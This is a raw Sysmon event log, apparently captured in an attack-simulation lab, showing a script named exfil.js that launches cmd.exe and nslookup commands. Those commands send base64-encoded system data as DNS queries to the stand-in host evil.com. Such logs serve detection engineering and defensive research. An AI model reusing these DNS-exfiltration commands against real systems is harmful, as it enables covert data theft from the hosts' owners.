14:21:38.459{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211344Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.459{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211343Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.459{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211342Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.459{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211341Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.459{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F2-629A-9844-000000005F02}2328C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211340Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.459{2E1864BB-18E0-629A-6742-000000005F02}39762952C:\Windows\System32\WScript.exe{2E1864BB-18F2-629A-9844-000000005F02}2328C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000211339Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.468{2E1864BB-18F2-629A-9844-000000005F02}2328C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Kioqd2luMzJfY29tcHV0ZXJzeXN0ZW0qKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlihvp.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000211338Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.459{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlfndyq.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000211337Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.428{2E1864BB-18F2-629A-9644-000000005F02}51287288C:\Windows\system32\conhost.exe{2E1864BB-18F2-629A-9744-000000005F02}6372C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211336Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.428{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211335Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.428{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211334Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.428{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211333Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.428{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211332Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.428{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F2-629A-9744-000000005F02}6372C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211331Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.428{2E1864BB-18F2-629A-9544-000000005F02}79205916C:\Windows\system32\cmd.exe{2E1864BB-18F2-629A-9744-000000005F02}6372C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000211330Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.431{2E1864BB-18F2-629A-9744-000000005F02}6372C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F2-629A-9544-000000005F02}7920C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfndyq.tmp 2>&1 10341000x8000000000000000211329Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.414{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18F2-629A-9644-000000005F02}5128C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211328Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.414{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F2-629A-9644-000000005F02}5128C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211327Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.381{2E1864BB-18F2-629A-9644-000000005F02}51287288C:\Windows\system32\conhost.exe{2E1864BB-18F2-629A-9544-000000005F02}7920C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211326Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.381{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F2-629A-9644-000000005F02}5128C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211325Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.360{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211324Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.360{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211323Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.360{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211322Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.360{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211321Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.360{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F2-629A-9544-000000005F02}7920C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211320Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.360{2E1864BB-18E0-629A-6742-000000005F02}39761696C:\Windows\System32\WScript.exe{2E1864BB-18F2-629A-9544-000000005F02}7920C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000211319Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.368{2E1864BB-18F2-629A-9544-000000005F02}7920C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfndyq.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000211318Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.344{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlgxxkg.tmpMD5=13B747063E29DDAFB1C25744F690BAA2,SHA256=FFD02DE1BE5A2F9B37BEA75BF31D9F7DC3AB49C7A69DB9B5050D219E835321C0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000211317Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.836{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50899- 354300x8000000000000000211316Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.835{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50898- 354300x8000000000000000211315Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.835{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50897- 354300x8000000000000000211314Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.751{00000000-0000-0000-0000-000000000000}7488<unknown process>-udpfalsefalse127.0.0.1-50896-false127.0.0.1-53domain 354300x8000000000000000211313Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.751{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50896- 354300x8000000000000000211312Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.751{00000000-0000-0000-0000-000000000000}7488<unknown process>-udptruefalse127.0.0.1-50896-false127.0.0.1-53domain 354300x8000000000000000211311Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.751{00000000-0000-0000-0000-000000000000}7488<unknown process>-udpfalsefalse127.0.0.1-50895-false127.0.0.1-53domain 354300x8000000000000000211310Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.751{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50895- 354300x8000000000000000211309Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.751{00000000-0000-0000-0000-000000000000}7488<unknown process>-udptruefalse127.0.0.1-50895-false127.0.0.1-53domain 354300x8000000000000000211308Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.750{00000000-0000-0000-0000-000000000000}7488<unknown process>-udpfalsefalse127.0.0.1-50894-false127.0.0.1-53domain 354300x8000000000000000211307Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 